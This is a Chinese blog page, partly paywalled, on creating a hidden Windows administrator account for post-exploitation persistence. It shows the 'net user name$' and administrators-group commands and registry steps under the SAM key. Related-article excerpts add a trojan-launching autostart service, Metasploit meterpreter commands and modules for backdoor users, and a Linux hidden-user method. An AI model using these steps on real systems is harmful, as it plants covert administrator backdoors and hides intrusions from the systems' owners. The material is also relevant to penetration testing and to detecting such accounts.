创建隐藏用户(权限维持)

最新推荐文章于 2025-11-11 19:57:14 发布
最新推荐文章于 2025-11-11 19:57:14 发布
阅读量305 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: web安全 网络安全 安全 服务器 windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_60397325/article/details/129910054
这篇博客介绍了如何通过注册表操作在Windows系统中创建一个隐藏用户,该用户不会显示在控制面板的用户账户列表中,也无法通过常规方式删除。尽管用户登录会产生账户信息,但可以通过更改注册表中用户类型的设置进一步隐藏其存在。

8.创建隐藏用户(深藏)

1. net user zmx$ 123 /add 		   	# 创建一个隐藏用户(隐藏用户用net user查看不到,但注销登录可见)
   net localgroup administrators zmx$ /add	# 把隐藏用户加入到管理员组

由于现在创建的用户并没有绝对隐藏,所以使用注册表来进行隐藏

2. win + r 输入 regedit 			   # 打开注册表,找到以下内容
    HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account
了解本专栏 订阅专栏 解锁全文 超级会员免费看
隐藏用户创建和使用
不忘初心,护天下安全!
07-01 1132
windows 环境下创建用户如果后面带了一个"$"符号,在 net user 时默认是不显示的,下文基于这个特性展开新建一个隐藏账户并加入管理员组 (需要管理员权限) 如上图,查看用户时看不到新建的admin$用户。但是在控制面板的管理工具中的用户用户组,仍可以查看到该用户的存在在注册表"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names"下可以找到新建的帐户"admin$"(默认注册表HKEY_LOCAL_MACHINE\SAM\SA
Linux权限维持隐藏踪迹篇
渗透之路,攻防之间皆学问
04-15 2655
攻击者在获取服务器权限后,会通过一些技巧来隐藏自己的踪迹和留下后门,本文介绍Linux下的几种隐藏技术。 端口复用是指不同的应用程序使用相同端口进行通讯。我们可以通过端口复用来达到隐藏端口的目的。其他作用还有很多,如内网渗透中,搭建隧道时,服务器仅允许指定的端口对外开放。利用端口复用可以将3389或22等端口转发到如80端口上,以便外部连接。...
创建隐藏用户
shashengwandaren的博客
01-14 610
1.管理员权限运行cmd 一个比较简单的方式就是“用户名$” 指令 “net user 用户名$123 /add"这个指令就可以设置一个隐藏用户,然后我们再尝试将该用户提升成为管理员,指令为:”net user localgroup administrators 用户名 $ /add" 命令执行成功后我们可以输入"net user"查看一下 发现的确没有刚刚我们创建用户,说明我们创建成功 但是这种方式在用户管理界面下是行不通的。 在这里,用户暴露无遗。 这时候我们就需要通过另一个东西来实现了。那就
windows建立隐藏账户(注册表与本地账户管理都查不到)
W小哥
05-22 2577
一、Windows新建隐藏账号 CMD进入工具HideAdmin所在的目录下 输入HideAdmin.exe后出现使用方法 然后按照提示新建隐藏账户xiaowang 密码:xiaowang 利用这款工具建立的账户隐藏效果与修改注册表的效果是一样的。 在计算机管理中查看不到隐藏账户xiaowang 接下来去注册表中查看隐藏账户 输入“regedt32.exe”后回车,随后会弹出另一个“注册表编辑器 来到“HKEY_LOCAL_MACHINE SAM SAM DomainsAccountUsersN
Windows 系统中创建隐藏用户的原理与实战-windows如何创建隐藏用户?0基础手把手教会你!
最新发布
2501_91976946的博客
11-11 1062
点击test$,查看右边对应的类型是3eb结尾,所以我们就找到3EB结尾的文件,右键选择导出,这个test$对应的注册表文件我导出命名为2,方便后续操作。打开计算机管理选择本地用户和组,点击用户,发现没有test用户了,说明使用注册表隐藏账户操作是成功了的。就可以进入计算机管理,点击本地用户和组,再点击用户,就可以看见我们创建隐藏用户test$依次点击如图点击对应的文件,就可以看见创建的test用户隐藏用户)找到test$文件,右键导出,我导出在桌面,命名为1,方便后续操作。
windows创建隐藏用户
爱玩游戏的黑客的博客
11-24 3410
这里的0x表示的是16进制后面的3ea则就表示账号的基本信息,我们进行账号隐藏的关键点就在于此。要做的是把administrator的用户信息替换到hack$的用户信息上就可以了。在【计算机管理】-【本地用户和组】-【组】-【Administrators】查看,发现hack¥被添加进去了。点击【SAM】-【SAM】-【Domains】-【Users】-【Names】就能看到目前系统存在的账号了。但在注册表里是有的。点击【Administrators】-勾选【完全控制】,【读取】的允许那几个框。
Windows Server 创建隐藏账户
qq_61861243的博客
10-05 2780
Windows Server 创建隐藏账户
【玄机】第三章 权限维持-linux权限维持-隐藏
weixin_46148739的博客
08-22 1202
【玄机】第三章 权限维持-linux权限维持-隐藏
利用安全描述符隐藏服务后门进行权限维持1
08-03
### 利用安全描述符隐藏服务后门进行权限维持 #### 概述 在网络安全领域,权限维持是一项关键技能,特别是在渗透测试过程中。本文将详细解释如何通过修改服务的安全描述符(Security Descriptor Definition ...
SC实现隐藏Windows服务维持权限
XunanSec的博客
05-31 1311
简介: sc.exe是Windows系统文件中自带的服务管理程序,可远程对服务进行操作;这里讲述了利用sc和Powershell程序来隐藏服务,搭到长期维持权限的效果。 创建服务 创建一个服务名为demo的自启动服务,服务运行地址指向木马路径,以tcpip协议传输并以本地系统权限运行 sc create demo start= auto binPath="cmd.exe /k C:\tu.exe" depend= Tcpip obj= Localsystem 添加个描述 sc descr
51-5 权限维持2 - 影子账号(隐藏用户
weixin_43263566的博客
07-04 451
权限维持技术(Persistence,也称为权限持久化)是一种能够在系统重启、用户更改密码或其他可能导致访问中断的情况下保持对系统访问的技术。例如,它包括创建系统服务、利用计划任务、修改系统启动项或注册表、以及映像劫持等方法。影子账户是指隐藏账户,无论通过计算机管理还是命令行都无法直接查看,只能在注册表中找到其信息。通常,通过创建具有管理员权限的影子账户来实现在目标主机上的权限维持,但需要拥有管理员级别的权限
windows建立隐藏账户
The current road is different, love needs to distinguish between right and wrong
11-18 6002
该方法在网上已有很多相关文章。 测试系统:windows7 一、隐藏账户创建 先查看一下本机存在的账户 新建一个隐藏账户并加入管理员组 (需要管理员权限) net user admin$ admin /add net localgroup administrators admin$ /add #用户名要以$结尾 此时运行“net user” 命令是看不到新建的"admin$" 用户的。 因为这里环境是win7 ,所以进入到控制面板 ...
网络安全入门学习练手——windows创建隐藏用户
p36273的博客
05-19 7299
(例如使用D盾查杀)
window下怎样创建隐藏帐户
luanshaofeng的程序人生
02-22 5612
当黑客入侵一台主机后,会想方设法保护自己的“劳动成果”,因此会在肉鸡上留下种种后门来长时间得控制肉鸡,其中使用最 多的就是账户隐藏技术。在肉鸡上建立一个隐藏账户,以备需要的时候使用。账户隐藏技术可谓是最隐蔽的后门,一般用户 很难发现系统中隐藏账户的存在,因此危害性很大,本文就对隐藏账户这种黑客常用的技术进行揭密。      在隐藏系统账户之前,我们有必要先来了解一下如何才能查看系统中已经存在的
创建超级隐藏用户
weixin_30802171的博客
05-30 556
1.先通过命令创建隐藏账户 net user test$ 123.com /add 在net user 发现看不到用户 但是 在用户组是可以看到的 先把加入管理员组在禁用 我们可以把用户命名成上面一样的用户名 都是禁用状态 可以迷惑管理员 2.复制admin权限 打开注册表 打开注册表编辑器,点击:HKEY_LOCAL_MACHINE → ...
Windows隐藏用户
2301_76272092的博客
08-07 2440
当电脑中病毒时,有些病毒(如:挖矿病毒)会在电脑中创建隐藏用户,以此开启后门,获得电脑的长期权限
学习进阶之路 #权限维持]P1、隐藏用户创建与利用
ALLEN'Blog
03-15 341
导入成功后回到管理工具中的查看用户用户组的页面,发现用户组和用户已经没有admin$这个用户的存在了,但实则上我们仍可以用这个用户的密码进行登录RDP,而且可以相当于。netsh 是 windows 的网络配置命令,advfirewall firewall 意思为防火墙的高级设置,add rule 是添加一条规则,name。发现用户未授权,这时候又多了一个利用条件,要在右下的选择用户下,添加admin$用户用户名,才能正常登录3389。,在工具栏上的 **“编辑 > 权限” **中设置权限 ,将。
Windows 7隐藏用户测试
qq_42108074的博客
11-26 1068
因为administrator和hack$都在一个组里,所以权限值是相同的。要做的是把administrator的用户信息替换到hack$的用户信息上就可以了。下边都是在虚拟机Window 7上操作,直到最后远程连接才在自己本机Windows 11上操作。在计算机管理里边,鼠标右键点击用户,然后再用鼠标左键点击刷新,也没有。在计算机管理里边,鼠标右键点击用户,然后再用鼠标左键点击刷新。上边都是在虚拟机上进行的操作,下边在自己本机上操作。先使用鼠标左键点击一下组,然后再用鼠标左键点击两下。
MSF攻击创建隐藏用户
07-24
在使用 Metasploit Framework (MSF) 进行渗透测试时,创建隐藏用户是一种常见的权限维持手段,通常用于在目标系统上保留后门以便后续访问。此操作通常发生在成功利用漏洞并获得目标系统的访问权限之后。 MSF 提供了多种方式来实现这一目标,具体方法取决于目标系统的操作系统类型(如 Windows、Linux 等)以及当前获得的权限级别。 ### 在 Windows 系统中创建隐藏用户Windows 系统中,可以通过 `net user` 命令创建隐藏用户,方法是在用户名后添加 `$` 符号,这样该用户将不会显示在登录界面中。例如: ```bash net user hacker$ password123 /add ``` 在 MSF 中,可以通过 `execute` 或 `shell` 命令执行上述操作,具体如下: ```ruby meterpreter > execute -f "net" -a "user hacker$ password123 /add" ``` ### 在 Linux 系统中创建隐藏用户 在 Linux 系统中,可以通过修改 `/etc/passwd` 文件来创建隐藏用户。通常,UID 小于 1000 的用户不会显示在图形登录界面中(具体行为取决于发行版和显示管理器)。例如,使用 `useradd` 命令创建隐藏用户: ```bash useradd -u 999 hiddenuser passwd hiddenuser ``` 在 MSF 的 Meterpreter 会话中,可以使用以下命令执行: ```ruby meterpreter > execute -f "useradd" -a "-u 999 hiddenuser" meterpreter > execute -f "passwd" -a "hiddenuser" ``` ### 使用 Metasploit 模块自动化创建隐藏用户 MSF 提供了多个后渗透模块用于自动化创建隐藏用户,例如: - `post/windows/manage/useradd`:用于在 Windows 系统中创建用户。 - `post/linux/manage/adduser`:用于在 Linux 系统中创建用户。 使用方法如下: ```ruby use post/windows/manage/useradd set SESSION <session_id> set USER_NAME hacker$ set USER_PASS password123 run ``` 上述操作可以实现创建隐藏用户的目的,并通过 Meterpreter 会话保持对目标系统的控制[^4]。 --- ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

鹏程万里.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值